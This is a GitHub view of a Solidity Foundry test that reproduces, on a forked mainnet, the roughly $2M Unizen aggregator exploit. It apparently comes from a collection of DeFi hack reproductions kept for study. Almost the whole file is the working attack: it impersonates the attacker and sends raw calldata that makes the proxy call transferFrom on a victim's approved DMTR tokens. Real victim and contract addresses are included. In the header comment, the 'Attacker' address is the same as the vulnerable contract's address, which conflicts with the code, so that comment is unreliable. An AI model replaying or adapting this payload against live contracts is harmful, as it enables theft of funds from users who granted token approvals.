forked from SunWeb3Sec/DeFiHackLabs
-
Notifications
You must be signed in to change notification settings - Fork 0
/
UnizenIO_exp.sol
38 lines (28 loc) · 3.16 KB
/
UnizenIO_exp.sol
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~2M USD$
// Attacker : https://etherscan.io/address/0xd3f64baa732061f8b3626ee44bab354f854877ac
// Vulnerable Contract : (Unizen: Trade Aggregator Proxy) https://etherscan.io/address/0xd3f64baa732061f8b3626ee44bab354f854877ac
// Attack Tx : https://phalcon.blocksec.com/explorer/tx/eth/0x923d1d63a1165ebd3521516f6d22d015f2e1b4b22d5dc954152b6c089c765fcd ( one of the transactions)
// @Analysis
// https://twitter.com/SlowMist_Team/status/1766311510362734824
// It's an unverified contract.
contract UniZenIOTest is Test {
address victim = address(0x7feAeE6094B8B630de3F7202d04C33f3BDC3828a);
address attacker = address(0x2aD8aed847e8d4D3da52AaBB7d0f5c25729D10df);
address aggregator_proxy = address(0xd3f64BAa732061F8B3626ee44bab354f854877AC);
IERC20 DMTR = IERC20(0x51cB253744189f11241becb29BeDd3F1b5384fdB);
function setUp() public {
vm.createSelectFork("mainnet",19393769);
emit log_named_uint("Before attack, victim DMTR amount (in ether)", DMTR.balanceOf(victim) / 1 ether);
emit log_named_uint("Before attack, victim approved DMTR amount (in ether) on UnizenAggregator", DMTR.allowance(victim,address(aggregator_proxy)) / 1 ether);
}
function testExploit() public {
vm.startPrank(attacker);
aggregator_proxy.call{value: 1}(hex"1ef29a02000000000000000000000000000000000000000000000000000000000000004000000000000000000000000000000000000000000000000000000000000001a00000000000000000000000002ad8aed847e8d4d3da52aabb7d0f5c25729d10df000000000000000000000000000000000000000000000000000000000000000000000000000000000000000051cb253744189f11241becb29bedd3f1b5384fdb000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000297963e6c9965e0000000000000000000000000000000000000000000000000000000000000012000000000000000000000000000000000000000000000000000000000000000110000000000000000000000000000000000000000000000000000000000000753000000000000000000000000000000000000000000000000000000000000000a554e495a454e2d434c49000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000002000000000000000000000000051cb253744189f11241becb29bedd3f1b5384fdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000060000000000000000000000000000000000000000000000000000000000000006423b872dd0000000000000000000000007feaee6094b8b630de3f7202d04c33f3bdc3828a000000000000000000000000d3f64baa732061f8b3626ee44bab354f854877ac0000000000000000000000000000000000000000000000023128cfbd15ed72f600000000000000000000000000000000000000000000000000000000");
emit log_named_uint("After attack, victim DMTR amount (in ether)", DMTR.balanceOf(victim) / 1 ether);
emit log_named_uint("After attack, victim approved DMTR amount (in ether) on UnizenAggregator", DMTR.allowance(victim,address(aggregator_proxy)) / 1 ether);
}
}